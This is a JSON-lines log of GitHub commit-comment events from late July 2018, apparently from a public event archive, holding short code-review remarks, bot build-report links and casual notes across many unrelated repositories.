{"id":"8034675171","type":"CommitCommentEvent","actor":{"login":"dataknut"},"repo":{"name":"dataknut/nzGREENGridDataR"},"payload":{"comment":{"id":29877181,"position":202,"line":167,"path":"dataProcessing/surveys/createHouseholdAttributes.Rmd","commit_id":"d7363fe3a96c7820be45af9afb8bd5dc224b07a6","created_at":"2018-07-29T21:30:20Z","updated_at":"2018-07-29T21:30:20Z","author_association":"OWNER","body":"#3 issue"}},"created_at":"2018-07-29T21:30:20Z"}
{"id":"8034677895","type":"CommitCommentEvent","actor":{"login":"AmineChikhaoui"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29877191,"position":null,"line":null,"path":null,"commit_id":"57b9719e4cf601c617f02f59365e7218eefb9b0f","created_at":"2018-07-29T21:32:18Z","updated_at":"2018-07-29T21:32:18Z","author_association":"MEMBER","body":"I think you missed this also: https://github.com/NixOS/nixpkgs/pull/44212.\r\nA one liner but I don't have commit bits :p\r\n"}},"created_at":"2018-07-29T21:32:18Z"}
{"id":"8034679875","type":"CommitCommentEvent","actor":{"login":"walouster"},"repo":{"name":"php-pm/php-pm-httpkernel"},"payload":{"comment":{"id":29877195,"position":5,"line":83,"path":"Bootstraps/Symfony.php","commit_id":"dac6439b96245daf19bb2ea69deca261a59c7dc8","created_at":"2018-07-29T21:33:50Z","updated_at":"2018-07-29T21:33:50Z","author_association":"NONE","body":"typo: should be `getenv('TRUSTED_PROXIES')` without `]`"}},"created_at":"2018-07-29T21:33:50Z"}
{"id":"8034680139","type":"CommitCommentEvent","actor":{"login":"walouster"},"repo":{"name":"php-pm/php-pm-httpkernel"},"payload":{"comment":{"id":29877196,"position":10,"line":87,"path":"Bootstraps/Symfony.php","commit_id":"dac6439b96245daf19bb2ea69deca261a59c7dc8","created_at":"2018-07-29T21:34:03Z","updated_at":"2018-07-29T21:34:03Z","author_association":"NONE","body":"same here"}},"created_at":"2018-07-29T21:34:03Z"}
{"id":"8034680281","type":"CommitCommentEvent","actor":{"login":"waaronmorris"},"repo":{"name":"waaronmorris/CS162_Group_15_Project_1"},"payload":{"comment":{"id":29877197,"position":42,"line":53,"path":"Board.cpp","commit_id":"2502337cb7770a030bd0f7f84824450f10d772a0","created_at":"2018-07-29T21:34:10Z","updated_at":"2018-07-29T21:34:10Z","author_association":"OWNER","body":"The critter count is for how many of that type of critter has been instantiated at this point. The extend method extends then dynamic array."}},"created_at":"2018-07-29T21:34:10Z"}
{"id":"8034680440","type":"CommitCommentEvent","actor":{"login":"GJDeY"},"repo":{"name":"GJDeY/HW-Wireframe"},"payload":{"comment":{"id":29877198,"position":null,"line":null,"path":null,"commit_id":"d314b9b09f8965811c8d00baafd12db4f6503848","created_at":"2018-07-29T21:34:17Z","updated_at":"2018-07-29T21:34:17Z","author_association":"OWNER","body":"7/29/2018 4:33pm upload easier assignment"}},"created_at":"2018-07-29T21:34:17Z"}
{"id":"8034681010","type":"CommitCommentEvent","actor":{"login":"whatwhatyou"},"repo":{"name":"whatwhatyou/gg"},"payload":{"comment":{"id":29877201,"position":14,"line":14,"path":"todo/cratch.html","commit_id":"fcdae2961f3740c4f0701d962d0dce71b5247bc9","created_at":"2018-07-29T21:34:45Z","updated_at":"2018-07-29T21:34:45Z","author_association":"OWNER","body":"ghjl"}},"created_at":"2018-07-29T21:34:45Z"}
{"id":"8034681172","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29877205,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T21:34:53Z","updated_at":"2018-07-29T21:34:53Z","author_association":"MEMBER","body":"This code was supposed to be self-explaining but I think it is fine with the suggested implementation in the new PR. Feel free to ask questions in commits when my code is not clear (or in PRs as this code went under review)."}},"created_at":"2018-07-29T21:34:53Z"}
{"id":"8034682343","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":29877210,"position":null,"line":null,"path":null,"commit_id":"738c276af7bde4eed1ddae467abe0f28cee067fb","created_at":"2018-07-29T21:35:52Z","updated_at":"2018-07-29T21:35:52Z","author_association":"MEMBER","body":"(or for modifications, I'm happy to make my code clearer)"}},"created_at":"2018-07-29T21:35:52Z"}
{"id":"8034682668","type":"CommitCommentEvent","actor":{"login":"corytortoise"},"repo":{"name":"corytortoise/PvPLevels"},"payload":{"comment":{"id":29877211,"position":null,"line":null,"path":null,"commit_id":"4071de6150b5ba333548515cb674a38f6b3803d8","created_at":"2018-07-29T21:36:07Z","updated_at":"2018-07-29T21:36:07Z","author_association":"OWNER","body":"Wrong place, but are you asking what it is, or for me to bump it? In the latest commit, This plugin works with 3.1.1 or 3.0.3. You'll have to let me know if you are running a different version of PMMP."}},"created_at":"2018-07-29T21:36:07Z"}
{"id":"8034685284","type":"CommitCommentEvent","actor":{"login":"luuucaaas29"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29877225,"position":null,"line":null,"path":null,"commit_id":"625a0f4ff07a024c1636348ac94bfc986a8e6929","created_at":"2018-07-29T21:38:09Z","updated_at":"2018-07-29T21:38:09Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Cadastro de Material](https://trello.com/c/ueMs1QF5/8-cadastro-de-material)"}},"created_at":"2018-07-29T21:38:09Z"}
{"id":"8034691890","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29877247,"position":null,"line":null,"path":null,"commit_id":"2f9cf22e3e67df9605785ab65f3b5c6782d55f80","created_at":"2018-07-29T21:43:12Z","updated_at":"2018-07-29T21:43:12Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 738](https://travis-ci.org/per1234/arduino-ci-script/builds/409625089) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00738-001-tsv"}},"created_at":"2018-07-29T21:43:12Z"}
{"id":"8034692052","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29877249,"position":null,"line":null,"path":null,"commit_id":"2f9cf22e3e67df9605785ab65f3b5c6782d55f80","created_at":"2018-07-29T21:43:20Z","updated_at":"2018-07-29T21:43:20Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 738](https://travis-ci.org/per1234/arduino-ci-script/builds/409625089) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00738"}},"created_at":"2018-07-29T21:43:20Z"}
{"id":"8034696327","type":"CommitCommentEvent","actor":{"login":"shreyans800755"},"repo":{"name":"ksdme/coala"},"payload":{"comment":{"id":29877264,"position":13,"line":164,"path":"coalib/coala_main.py","commit_id":"8a149234c6dbec611e5885f4b6b1861e2356c51e","created_at":"2018-07-29T21:46:38Z","updated_at":"2018-07-29T21:46:38Z","author_association":"NONE","body":"You'll be replacing this with a function call which parses the CLI args and gives a list of filters, right ?"}},"created_at":"2018-07-29T21:46:38Z"}
{"id":"8034697333","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877271,"position":7,"line":7,"path":"2/alphabet.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T21:47:26Z","updated_at":"2018-07-29T21:47:26Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-29T21:47:26Z"}
{"id":"8034697374","type":"CommitCommentEvent","actor":{"login":"OptimusCrime"},"repo":{"name":"exside/revolution"},"payload":{"comment":{"id":29877272,"position":11,"line":246,"path":"core/model/modx/transport/modtransportpackage.class.php","commit_id":"6a2f944970b4fde1ddc1f1433b46454ba7c34401","created_at":"2018-07-29T21:47:28Z","updated_at":"2018-07-29T21:47:28Z","author_association":"NONE","body":"Nitpick: You can just return this right away. No use in storing the information in a variablen, then returning it right after. Other than that I think this improves readability very much :)"}},"created_at":"2018-07-29T21:47:28Z"}
{"id":"8034697939","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877273,"position":23,"line":33,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T21:47:51Z","updated_at":"2018-07-29T21:47:51Z","author_association":"NONE","body":"with the dispose function, everything should be cacheable."}},"created_at":"2018-07-29T21:47:51Z"}
{"id":"8034699433","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877278,"position":89,"line":113,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T21:49:04Z","updated_at":"2018-07-29T21:49:04Z","author_association":"NONE","body":"avoid code bloat, lower_bound is basically bsearch.\r\n\r\nSince this is a cache you're only allowed one entry per key, so if the result of your lower_bound equals the key you are searching for... you've found it!"}},"created_at":"2018-07-29T21:49:04Z"}
{"id":"8034700815","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877279,"position":4,"line":4,"path":"2/alphabet.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T21:50:09Z","updated_at":"2018-07-29T21:50:09Z","author_association":"NONE","body":"В задании нужен порядковый номер в алфавите. А в массиве у нас отсчет начинается с 0. (Даже в задании написано \"порядковый номер буквы в алфавите (a - 1)\".)"}},"created_at":"2018-07-29T21:50:09Z"}
{"id":"8034701055","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"BarabasGitHub/ZigZag"},"payload":{"comment":{"id":29877280,"position":111,"line":111,"path":"bipartite_buffer.zig","commit_id":"d9133a9919f3f1c709c979e6be357661c41b30b0","created_at":"2018-07-29T21:50:19Z","updated_at":"2018-07-29T21:50:19Z","author_association":"NONE","body":"I recommend to only use `inline` when you need a semantic guarantee that there is no stack frame for the function call. If you do a performance measurement and `inline` made the code faster, that's reasonable too.\r\n\r\nOtherwise, you're actually restricting the optimizer's options."}},"created_at":"2018-07-29T21:50:19Z"}
{"id":"8034701788","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29877282,"position":300,"line":43,"path":"hardware/power/Power.h","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-29T21:50:50Z","updated_at":"2018-07-29T21:50:50Z","author_association":"NONE","body":"I think need disable it.\r\nOtherwise we can't setup to off touch key light (bug: https://forum.xda-developers.com/showpost.php?p=77200307&postcount=60)"}},"created_at":"2018-07-29T21:50:50Z"}
{"id":"8034701915","type":"CommitCommentEvent","actor":{"login":"Sidoine"},"repo":{"name":"Sidoine/Ovale"},"payload":{"comment":{"id":29877285,"position":null,"line":null,"path":null,"commit_id":"a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795","created_at":"2018-07-29T21:50:55Z","updated_at":"2018-07-29T21:50:55Z","author_association":"OWNER","body":"Yes, I'm working on it but it will take some time before it is in a in a\nusable state :) I should have started that a long time ago,...\n\nLe dim. 29 juil. 2018 à 22:03, ShmooDude <notifications@github.com> a\nécrit :\n\n> I've been wanting to do this for a while but I just don't have the\n> programming knowhow to do it. Hope you can get it working as it'd greatly\n> simplify things. :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Sidoine/Ovale/commit/a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795#commitcomment-29876780>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADJE0EvfQwszN9riwvBA5VaX1TEgnzztks5uLhUcgaJpZM4VljG5>\n> .\n>\n"}},"created_at":"2018-07-29T21:50:55Z"}
{"id":"8034702810","type":"CommitCommentEvent","actor":{"login":"vantuz-subhuman"},"repo":{"name":"input-output-hk/cardano-sl"},"payload":{"comment":{"id":29877287,"position":224,"line":1495,"path":"docs/delegation_design_spec.md","commit_id":"177184c6f4559262dd15e2bbc7dfbc4e1b215440","created_at":"2018-07-29T21:51:38Z","updated_at":"2018-07-29T21:51:38Z","author_association":"NONE","body":"Hello! Sorry to bother like this, but i'm really trying to understand the formula, and have a couple of small questions and would really really appreciate any clarification:\r\n1. `sigma` means \"the relative stake of the pool\" - this means **excluding** the leader stake, right? So only the relative stake of all the delegates, part from leader?\r\n2. `s` means \"the relative stake of the pool leader\" - this means relative to the total stake, right? Not relative to this pool's stake, but to all stake in the system?\r\n\r\nIf both questions are true, then do I get it right that both relative pool stake (without the leader) and relative leader stake are \"capped\" at `z0`? So, for example, if `k` is 100, then both `sigma` and `s` may be at most `0.01`, right?\r\n\r\nWould really appreciate an answer. Thank you!"}},"created_at":"2018-07-29T21:51:38Z"}
{"id":"8034703789","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877291,"position":98,"line":126,"path":"include/CObjectCache.h","commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T21:52:21Z","updated_at":"2018-07-29T21:52:21Z","author_association":"NONE","body":"std::vector reallocates rarely, not on every single push_back or erase will cause grow/shrink of reserved memory.\r\n\r\nerase shouldn't perform slower than remove_if\r\nand it should be much faster if you are removing near the end"}},"created_at":"2018-07-29T21:52:21Z"}
{"id":"8034704574","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29877292,"position":null,"line":null,"path":null,"commit_id":"41cb55619b78ef194cac3ab4076ac0cd04ede589","created_at":"2018-07-29T21:52:58Z","updated_at":"2018-07-29T21:52:58Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-200](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-200).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-200-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-29T21:52:58Z"}
{"id":"8034704925","type":"CommitCommentEvent","actor":{"login":"volta2016"},"repo":{"name":"volta2016/flex-box-example"},"payload":{"comment":{"id":29877293,"position":null,"line":null,"path":null,"commit_id":"0bf7ed20767ce108aa4647ea35737e2e711faf0c","created_at":"2018-07-29T21:53:14Z","updated_at":"2018-07-29T21:53:14Z","author_association":"OWNER","body":"verified"}},"created_at":"2018-07-29T21:53:14Z"}
{"id":"8034705522","type":"CommitCommentEvent","actor":{"login":"ksnehalakshmi"},"repo":{"name":"ksnehalakshmi/spring-petclinic"},"payload":{"comment":{"id":29877295,"position":null,"line":null,"path":null,"commit_id":"59fe483a981c8e4afd15399a11161bf675204994","created_at":"2018-07-29T21:53:41Z","updated_at":"2018-07-29T21:53:41Z","author_association":"OWNER","body":"sample line for commit"}},"created_at":"2018-07-29T21:53:41Z"}
{"id":"8034706131","type":"CommitCommentEvent","actor":{"login":"ksnehalakshmi"},"repo":{"name":"ksnehalakshmi/spring-petclinic"},"payload":{"comment":{"id":29877303,"position":null,"line":null,"path":null,"commit_id":"59fe483a981c8e4afd15399a11161bf675204994","created_at":"2018-07-29T21:54:10Z","updated_at":"2018-07-29T21:54:10Z","author_association":"OWNER","body":"sample commit"}},"created_at":"2018-07-29T21:54:10Z"}
{"id":"8034706425","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"g-truc/glm"},"payload":{"comment":{"id":29877307,"position":null,"line":null,"path":null,"commit_id":"cd58024e40147f871d5a871c8ded90808da99474","created_at":"2018-07-29T21:54:25Z","updated_at":"2018-07-29T21:54:25Z","author_association":"NONE","body":"I think for ideal performance circularRand and sphericalRand should not have a radius argument and expect the user to multiply with radius themselves as multiplying with radius in case of wanting a normalized value (radius = 1) which happens often for random values is redundant."}},"created_at":"2018-07-29T21:54:25Z"}
{"id":"8034707199","type":"CommitCommentEvent","actor":{"login":"SATYAKRISHNAVINJAMURI"},"repo":{"name":"SATYAKRISHNAVINJAMURI/useful_code"},"payload":{"comment":{"id":29877311,"position":1,"line":1,"path":"LICENSE.md/far.sh","commit_id":"60b81f1784a3ef84aa9a367486d9b489915a2f0f","created_at":"2018-07-29T21:55:01Z","updated_at":"2018-07-29T21:55:01Z","author_association":"OWNER","body":"This Code is written in shell script specifically for bash shell and can be used to replace a word with another word in all the files present in that directory and sub directories.\r\n"}},"created_at":"2018-07-29T21:55:01Z"}
{"id":"8034707578","type":"CommitCommentEvent","actor":{"login":"francisyyan"},"repo":{"name":"StanfordSNR/puffer"},"payload":{"comment":{"id":29877313,"position":5,"line":529,"path":"src/media-server/ws_media_server.cc","commit_id":"507e45cd45d6604538b50e0c38748ad096a13ff1","created_at":"2018-07-29T21:55:18Z","updated_at":"2018-07-29T21:55:18Z","author_association":"MEMBER","body":"Try to make it <= 79 characters per line."}},"created_at":"2018-07-29T21:55:18Z"}
{"id":"8034710211","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877324,"position":null,"line":null,"path":null,"commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T21:57:35Z","updated_at":"2018-07-29T21:57:35Z","author_association":"NONE","body":"i expect the user to have to common sense to do find(key)!=nullptr rather than contains.\r\n\r\nExtra points for a solution where one could speed up the `insert` by using the return value from `getByKey`,\r\nessentially if after locking (or not in the case of non concurrent) the \"hint\" iterator is valid (within the range of begin to end) and the value at that position in the container still equals the \"hint\"'s values then insert at hint. Otherwise find and insert as usual.\r\n\r\nP.S. So this class right now supports vector,map and unordered_map?"}},"created_at":"2018-07-29T21:57:35Z"}
{"id":"8034710270","type":"CommitCommentEvent","actor":{"login":"francisyyan"},"repo":{"name":"StanfordSNR/puffer"},"payload":{"comment":{"id":29877325,"position":16,"line":540,"path":"src/media-server/ws_media_server.cc","commit_id":"507e45cd45d6604538b50e0c38748ad096a13ff1","created_at":"2018-07-29T21:57:38Z","updated_at":"2018-07-29T21:57:38Z","author_association":"MEMBER","body":"`if (not new_channel_string.empty()) {`: missing space and prefer `not/and/or`.\r\n"}},"created_at":"2018-07-29T21:57:38Z"}
{"id":"8034710344","type":"CommitCommentEvent","actor":{"login":"ivan"},"repo":{"name":"andir/nixpkgs"},"payload":{"comment":{"id":29877327,"position":75,"line":75,"path":"pkgs/tools/archivers/gnutar/allow-remote.patch","commit_id":"23e297be8b9e861f532e1faaa8a115c57f0b7274","created_at":"2018-07-29T21:57:41Z","updated_at":"2018-07-29T21:57:41Z","author_association":"NONE","body":"Maybe \"archive file is remote when it contains a colon\"?"}},"created_at":"2018-07-29T21:57:41Z"}
{"id":"8034712554","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877332,"position":12,"line":12,"path":"2/day_of_year.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T21:59:22Z","updated_at":"2018-07-29T21:59:22Z","author_association":"NONE","body":"А зачем тут проверка, если месяц больше 2? Редьюс не плохо справиться даже с первым месяцем\r\n```\r\n2.2.4 :004 > [1, 2, 3][0...0].reduce(1, :+)\r\n => 1\r\n```"}},"created_at":"2018-07-29T21:59:22Z"}
{"id":"8034713121","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877333,"position":16,"line":16,"path":"2/day_of_year.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T21:59:40Z","updated_at":"2018-07-29T21:59:40Z","author_association":"NONE","body":"Тут end уехал"}},"created_at":"2018-07-29T21:59:40Z"}
{"id":"8034714738","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877349,"position":15,"line":15,"path":"2/list_of_product.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T22:00:32Z","updated_at":"2018-07-29T22:00:32Z","author_association":"NONE","body":"Поправь индентацию"}},"created_at":"2018-07-29T22:00:32Z"}
{"id":"8034715036","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877352,"position":24,"line":24,"path":"2/list_of_product.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T22:00:43Z","updated_at":"2018-07-29T22:00:43Z","author_association":"NONE","body":"поправь индентацию"}},"created_at":"2018-07-29T22:00:43Z"}
{"id":"8034715391","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877353,"position":13,"line":13,"path":"2/month.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T22:00:56Z","updated_at":"2018-07-29T22:00:56Z","author_association":"NONE","body":"поправь индентацию"}},"created_at":"2018-07-29T22:00:56Z"}
{"id":"8034715679","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877354,"position":5,"line":5,"path":"2/number.rb","commit_id":"4ef50c9becb2c40846e2d47fa19aa6727dcc1639","created_at":"2018-07-29T22:01:07Z","updated_at":"2018-07-29T22:01:07Z","author_association":"NONE","body":"поправь индентацию\r\n\r\n"}},"created_at":"2018-07-29T22:01:07Z"}
{"id":"8034715920","type":"CommitCommentEvent","actor":{"login":"tocanto"},"repo":{"name":"ionic-team/starters"},"payload":{"comment":{"id":29877355,"position":null,"line":null,"path":null,"commit_id":"5ced5c6ef2bc633509acd277d6e589dcf2194229","created_at":"2018-07-29T22:01:15Z","updated_at":"2018-07-29T22:01:15Z","author_association":"NONE","body":"Excellent, thank you very much"}},"created_at":"2018-07-29T22:01:15Z"}
{"id":"8034717796","type":"CommitCommentEvent","actor":{"login":"francisyyan"},"repo":{"name":"StanfordSNR/puffer"},"payload":{"comment":{"id":29877365,"position":17,"line":541,"path":"src/media-server/ws_media_server.cc","commit_id":"507e45cd45d6604538b50e0c38748ad096a13ff1","created_at":"2018-07-29T22:02:33Z","updated_at":"2018-07-29T22:02:33Z","author_association":"MEMBER","body":"Unnecessary lookup because `new_channel` is exactly the `channel` defined previously."}},"created_at":"2018-07-29T22:02:33Z"}
{"id":"8034719206","type":"CommitCommentEvent","actor":{"login":"mtshields1"},"repo":{"name":"mtshields1/Snip-it"},"payload":{"comment":{"id":29877368,"position":null,"line":null,"path":null,"commit_id":"a3daca6f0252855e82e2a0f1c8e1b45523f48f1a","created_at":"2018-07-29T22:03:39Z","updated_at":"2018-07-29T22:03:39Z","author_association":"OWNER","body":"This commit primarily focused on user home page design. Three buttons were added; friends, snips, and record. Friends button will have a list of friends the user has + search functionality to find new ones. Snips button will have the user's currently received snips. Record will have the user record a new snip.\r\n\r\nThis commit had 2 additional notes:\r\n1. Changed compile in build.gradle file to implementation. Android is following suit with gradle adding implementation to get dependencies during run time, not compile time, for faster building.\r\n\r\n2. A lapse of self-communication lead to the discovery of a \"bug.\" Firebase DB instances were fired up and users were added in main execution for testing purposes. Because of this, a new user's DB key, how they can be identified in the DB, could easily be passed into the user home page activity. With the test code commented out, the DB key string needs to be found to be passed into the user home page activity to find the user; that is, because users aren't being created and pushed to the DB on the fly, the DB key for each user won't exist unless it's queried for."}},"created_at":"2018-07-29T22:03:39Z"}
{"id":"8034719220","type":"CommitCommentEvent","actor":{"login":"francisyyan"},"repo":{"name":"StanfordSNR/puffer"},"payload":{"comment":{"id":29877369,"position":33,"line":557,"path":"src/media-server/ws_media_server.cc","commit_id":"507e45cd45d6604538b50e0c38748ad096a13ff1","created_at":"2018-07-29T22:03:40Z","updated_at":"2018-07-29T22:03:40Z","author_association":"MEMBER","body":"Missing space again."}},"created_at":"2018-07-29T22:03:40Z"}
{"id":"8034720591","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29877375,"position":null,"line":null,"path":null,"commit_id":"911fb4e28d12c6bd3cefe299f4178d87d1c4f323","created_at":"2018-07-29T22:04:45Z","updated_at":"2018-07-29T22:04:45Z","author_association":"MEMBER","body":"I would prefer to avoid this one..."}},"created_at":"2018-07-29T22:04:45Z"}
{"id":"8034721381","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29877382,"position":null,"line":null,"path":null,"commit_id":"911fb4e28d12c6bd3cefe299f4178d87d1c4f323","created_at":"2018-07-29T22:05:22Z","updated_at":"2018-07-29T22:05:22Z","author_association":"MEMBER","body":"I think your issue can be solved differently"}},"created_at":"2018-07-29T22:05:22Z"}
{"id":"8034721971","type":"CommitCommentEvent","actor":{"login":"jheeeee"},"repo":{"name":"jinseon12/gongkang"},"payload":{"comment":{"id":29877385,"position":null,"line":null,"path":null,"commit_id":"8a5ed57d6e989fad0df2fc7b443557561c970732","created_at":"2018-07-29T22:05:49Z","updated_at":"2018-07-29T22:05:49Z","author_association":"COLLABORATOR","body":"Branch Test.."}},"created_at":"2018-07-29T22:05:49Z"}
{"id":"8034723136","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29877387,"position":8,"line":8,"path":"2/fourth.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T22:06:45Z","updated_at":"2018-07-29T22:06:45Z","author_association":"NONE","body":"Нет. Порядковый номер у первой гласной 1. Твоя программа выводит 0 итд"}},"created_at":"2018-07-29T22:06:45Z"}
{"id":"8034726209","type":"CommitCommentEvent","actor":{"login":"andir"},"repo":{"name":"andir/nixpkgs"},"payload":{"comment":{"id":29877399,"position":75,"line":75,"path":"pkgs/tools/archivers/gnutar/allow-remote.patch","commit_id":"23e297be8b9e861f532e1faaa8a115c57f0b7274","created_at":"2018-07-29T22:09:02Z","updated_at":"2018-07-29T22:09:02Z","author_association":"OWNER","body":"Yeah, will have to touch quiet a bit of the patch if we decide to go that route. There are a few rough edges... Thanks for the feedback. I'll integrate that in the next version :)"}},"created_at":"2018-07-29T22:09:02Z"}
{"id":"8034727075","type":"CommitCommentEvent","actor":{"login":"francisyyan"},"repo":{"name":"StanfordSNR/puffer"},"payload":{"comment":{"id":29877400,"position":65,"line":773,"path":"src/media-server/ws_media_server.cc","commit_id":"507e45cd45d6604538b50e0c38748ad096a13ff1","created_at":"2018-07-29T22:09:39Z","updated_at":"2018-07-29T22:09:39Z","author_association":"MEMBER","body":"Remove extra blank lines like this (unless you have a good reason)."}},"created_at":"2018-07-29T22:09:39Z"}
{"id":"8034727720","type":"CommitCommentEvent","actor":{"login":"olstenlarck"},"repo":{"name":"amio/now-deploy-badge"},"payload":{"comment":{"id":29877402,"position":null,"line":null,"path":null,"commit_id":"67622b95aff61ff8af25bd99c32d36a4e000ba37","created_at":"2018-07-29T22:10:07Z","updated_at":"2018-07-29T22:10:07Z","author_association":"NONE","body":"hm :thinking: "}},"created_at":"2018-07-29T22:10:07Z"}
{"id":"8034728929","type":"CommitCommentEvent","actor":{"login":"stevaricaf"},"repo":{"name":"stevaricaf/stevaricaf.github.io"},"payload":{"comment":{"id":29877411,"position":null,"line":null,"path":null,"commit_id":"29aa71143374528210322a32564e359a1806d898","created_at":"2018-07-29T22:11:01Z","updated_at":"2018-07-29T22:11:01Z","author_association":"OWNER","body":"ElkopInvest"}},"created_at":"2018-07-29T22:11:01Z"}
{"id":"8034731358","type":"CommitCommentEvent","actor":{"login":"270danielbritton"},"repo":{"name":"ChatSecure/ChatSecure-iOS"},"payload":{"comment":{"id":29877420,"position":null,"line":null,"path":null,"commit_id":"67e8c5ccef0af90975d153fb89dbd3a8ec4f6226","created_at":"2018-07-29T22:12:58Z","updated_at":"2018-07-29T22:12:58Z","author_association":"NONE","body":"Yes it’s still available! Please call 803-520-3020"}},"created_at":"2018-07-29T22:12:58Z"}
{"id":"8034734222","type":"CommitCommentEvent","actor":{"login":"khoi-nguyen"},"repo":{"name":"khoi-nguyen/maths"},"payload":{"comment":{"id":29877423,"position":null,"line":null,"path":null,"commit_id":"1e343a57650d3d669ba678fc0ab12080e75eedab","created_at":"2018-07-29T22:15:14Z","updated_at":"2018-07-29T22:15:14Z","author_association":"OWNER","body":"@dabertrand "}},"created_at":"2018-07-29T22:15:14Z"}
{"id":"8034734290","type":"CommitCommentEvent","actor":{"login":"ohuf"},"repo":{"name":"ioBroker/ioBroker.telegram"},"payload":{"comment":{"id":29877426,"position":null,"line":null,"path":null,"commit_id":"52ce08dc8e4fbd218c1b3d4468b5d2abbdabb1b5","created_at":"2018-07-29T22:15:17Z","updated_at":"2018-07-29T22:15:17Z","author_association":"NONE","body":"This mitigates issuse #99 in the iobroker Git!"}},"created_at":"2018-07-29T22:15:17Z"}
